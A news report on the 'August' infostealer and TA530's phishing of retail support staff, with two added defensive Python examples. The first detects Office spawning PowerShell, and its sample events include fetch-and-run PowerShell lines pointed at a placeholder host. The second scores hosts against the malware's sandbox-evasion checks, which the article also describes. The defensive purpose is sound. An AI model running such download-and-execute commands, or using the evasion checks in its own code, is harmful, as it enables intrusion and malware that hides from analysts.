In November 2016, a cyber-crime group began deploying a new malware family nicknamed "August," used mainly for information gathering and reconnaissance on the infected computer.
The crooks have used August in highly targeted spear-phishing attacks aimed at customer service and managerial staff at various retailers, according to US security firm Proofpoint, which first uncovered the attacks and the August malware.
This technique of targeting customer support representatives was also observed in the past month by security researchers from Trustwave, who reported seeing the Carbanak gang use the same method to infect two companies in the hospitality industry and a restaurant chain.
According to Proofpoint, behind the August malware stands a long-lived and experienced cyber-crime group tracked under the TA530 codename.
This threat actor has been extremely busy in the past year, targeting high-level executives with carefully tailored spear-phishing emails, usually put together from data gathered on LinkedIn and other sources.
The group has now added August to its toolkit. Functionally it is a mundane infostealer, but it is a newly created threat rather than a repurposed family.
For this campaign, TA530 has been sending spam emails disguised as customer complaints. Some of the subject lines allude to errors in orders that a customer support rep would be expected to investigate, and the rep often ends up opening the attached file to do so. Some of the cleverly crafted subject lines are:
A sample of the email sent to customer support staff is also embedded below.
In all cases, the attached file is a Word document containing a malicious macro. Proofpoint's analysis of this file showed that if the tricked victim allows the macro to execute, it launches a PowerShell script that downloads August and loads it directly into memory, so the infostealer itself is never written to disk (the so-called "fileless" technique). Only the Word document touches the file system, which is why file-based scanning alone tends to miss this stage and process-creation telemetry (an Office application spawning PowerShell) becomes the more useful signal.
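As an added example that is not part of the original article or of Proofpoint's analysis, the following Python sketches the process-creation detection a defender would want for this infection chain: PowerShell launched by an Office application, with command-line indicators of downloading and in-memory execution. The event records (fields modeled on Sysmon Event ID 1), the indicator patterns, and the verdict thresholds are all constructed for this example and are not strings taken from the report.

```python
"""Flag PowerShell spawned by an Office application with download or
in-memory execution indicators, run over constructed process-creation
records whose fields mirror Sysmon Event ID 1 (Image, ParentImage,
CommandLine)."""
import re
from dataclasses import dataclass

# Assumption: in this environment no Office application legitimately
# spawns PowerShell; add exceptions for your own deployment scripts.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Generic "download and run in memory" indicators chosen for this example;
# they are not taken from the Proofpoint analysis of August.
INDICATORS = {
    # -e / -en / -enc / -EncodedCommand followed by a base64 blob
    "encoded_command": re.compile(r"(?i)-e(?:n(?:c(?:odedcommand)?)?)?\s+[A-Za-z0-9+/=]{20,}"),
    "download": re.compile(r"(?i)downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|net\.webclient"),
    "in_memory_exec": re.compile(r"(?i)\biex\b|invoke-expression"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "policy_bypass": re.compile(r"(?i)-ex(?:ecutionpolicy)?\s+bypass|-nop\b|-noprofile"),
}


@dataclass
class Event:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: Event) -> dict:
    """Return a verdict and the indicators that fired for one event."""
    child = basename(event.image)
    parent = basename(event.parent_image)
    hits = [name for name, rx in INDICATORS.items() if rx.search(event.command_line)]
    office_spawn = parent in OFFICE_PARENTS and child in POWERSHELL_IMAGES
    if office_spawn and hits:
        verdict = "alert"          # Office -> PowerShell with loader indicators
    elif office_spawn:
        verdict = "suspicious"     # Office -> PowerShell, nothing else on the command line
    elif child in POWERSHELL_IMAGES and len(hits) >= 2:
        verdict = "review"         # loader-like PowerShell from a non-Office parent
    else:
        verdict = "none"
    return {"verdict": verdict, "indicators": hits, "office_spawn": office_spawn}


def triage(events: list) -> list:
    """Keep only events that need a look, paired with their analysis."""
    results = [(e, analyze(e)) for e in events]
    return [(e, r) for e, r in results if r["verdict"] != "none"]


# Constructed sample events; the base64 blob is filler, not a real payload.
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event(PS, WORD, "powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"),
    Event(PS, WORD, "powershell.exe -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\""),
    Event(PS, r"C:\Windows\explorer.exe", r"powershell.exe -File C:\Scripts\backup.ps1"),
    Event(r"C:\Windows\splwow64.exe", WORD, "splwow64.exe 12288"),
    Event(PS, r"C:\Windows\System32\cmd.exe", "powershell -w hidden iex (iwr http://example.invalid/x)"),
]

if __name__ == "__main__":
    for event, result in triage(SAMPLE_EVENTS):
        print(f"{result['verdict']:<10} {basename(event.parent_image)} -> {basename(event.image)} "
              f"indicators={result['indicators']}")
```

The parent/child pairing does most of the work: the command-line indicators only rank the alert, since an attacker can rename or re-encode them, while a Word process spawning PowerShell is hard to make look normal.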
Although August is only a first-stage infostealer, it uses several advanced anti-analysis techniques, some of which were first documented only in the past three months.
These techniques are environment checks rather than code obfuscation: the malware counts recently opened files, counts running processes, inspects task names, and looks up the victim's public IP address via the MaxMind IP-to-geolocation API.
Their purpose is to tell a real user's computer apart from a virtual machine or analysis sandbox. If it finds fewer than three recently opened files, very few running processes, task names hinting at reverse-engineering tools, or an IP address belonging to a well-known data center, August aborts execution, concluding that a researcher is trying to analyze it.
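Seen from the defender's side, these checks describe what an analysis host has to look like before the sample will detonate. The following Python, an added example that is not from the article or from Proofpoint, scores a host profile against the four checks so a sandbox operator can see which ones it would trip. Apart from "fewer than three" recent files, the thresholds, the tool-name list, the geolocation table standing in for a real MaxMind lookup, and both host profiles are constructed assumptions.

```python
"""Check whether an analysis host would trip the environment checks the
article attributes to August, using constructed host profiles."""
from dataclasses import dataclass

# Only "fewer than three" recent files is stated in the article; the other
# threshold and the tool-name markers are this example's assumptions.
MIN_RECENT_FILES = 3
MIN_PROCESS_COUNT = 40
ANALYSIS_TOOL_MARKERS = (
    "wireshark", "procmon", "process monitor", "procexp", "process explorer",
    "ollydbg", "x64dbg", "x32dbg", "idaq", "ida pro", "fiddler", "sysinternals",
)
# Constructed stand-in for a MaxMind-style lookup: IP prefix -> (org, is_hosting).
# A real deployment would query the service or a local GeoIP2 database.
GEOIP_TABLE = {
    "203.0.113.": ("Example Hosting LLC", True),
    "198.51.100.": ("Example Cloud Inc", True),
    "192.0.2.": ("Example Telecom (residential ISP)", False),
}


@dataclass
class HostProfile:
    recent_files: list      # names in the user's Recent folder
    processes: list         # image names of running processes
    window_titles: list     # visible task/window titles
    public_ip: str


def geoip_lookup(ip: str) -> tuple:
    """Return (organisation, is_hosting) for an IP from the constructed table."""
    for prefix, record in GEOIP_TABLE.items():
        if ip.startswith(prefix):
            return record
    return ("unknown", False)


def tripped_checks(host: HostProfile) -> list:
    """List the August-style checks this host would fail, in check order."""
    tripped = []
    if len(host.recent_files) < MIN_RECENT_FILES:
        tripped.append("recent_files")
    if len(host.processes) < MIN_PROCESS_COUNT:
        tripped.append("process_count")
    names = [n.lower() for n in host.processes + host.window_titles]
    if any(marker in name for name in names for marker in ANALYSIS_TOOL_MARKERS):
        tripped.append("analysis_tools")
    _org, is_hosting = geoip_lookup(host.public_ip)
    if is_hosting:
        tripped.append("datacenter_ip")
    return tripped


def would_run(host: HostProfile) -> bool:
    """True if the sample would proceed past all four checks on this host."""
    return not tripped_checks(host)


# Constructed profiles: a freshly provisioned sandbox and a seeded one.
BARE_SANDBOX = HostProfile(
    recent_files=[],
    processes=["System", "smss.exe", "csrss.exe", "wininit.exe", "services.exe",
               "lsass.exe", "svchost.exe", "explorer.exe", "Procmon64.exe", "WINWORD.EXE"],
    window_titles=["Process Monitor - Sysinternals: www.sysinternals.com"],
    public_ip="203.0.113.7",
)
SEEDED_HOST = HostProfile(
    recent_files=["Q4_orders.xlsx", "complaint_1182.docx", "returns_policy.pdf",
                  "vendor_list.xlsx", "notes.txt"],
    processes=["System", "smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe",
               "explorer.exe", "OUTLOOK.EXE", "WINWORD.EXE", "Teams.exe", "chrome.exe"]
              + ["svchost.exe"] * 30,   # padding to a realistic process count
    window_titles=["Inbox - Outlook", "complaint_1182.docx - Word"],
    public_ip="192.0.2.44",
)

if __name__ == "__main__":
    for label, host in (("bare sandbox", BARE_SANDBOX), ("seeded host", SEEDED_HOST)):
        print(f"{label}: tripped={tripped_checks(host)} would_run={would_run(host)}")
```

The fourth check is the one a sandbox cannot fix by seeding files: if detonation traffic egresses from hosting-provider address space, the sample exits before showing any behaviour, so the egress path matters as much as the guest image.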
If the environment passes these checks, August proceeds with its data-gathering routine, which includes:
All this data is sent to a remote command-and-control (C&C) server and is accessible to TA530 members through a Web-based control panel. Proofpoint researchers managed to gain access to one of these panels, shown below.
While August is a relatively new threat, the infostealer shows the same degree of sophistication and feature set seen in more mature threats such as Pony, Snifula, or CoreBot.
Its use of PowerShell for malicious purposes is also in line with a Symantec report released today, which found that 95.4% of the PowerShell scripts Symantec analyzed were malicious and that 111 malware families use Microsoft's PowerShell scripting language for malicious operations, such as downloading other malware or malware modules, or traversing a network in search of other valuable information.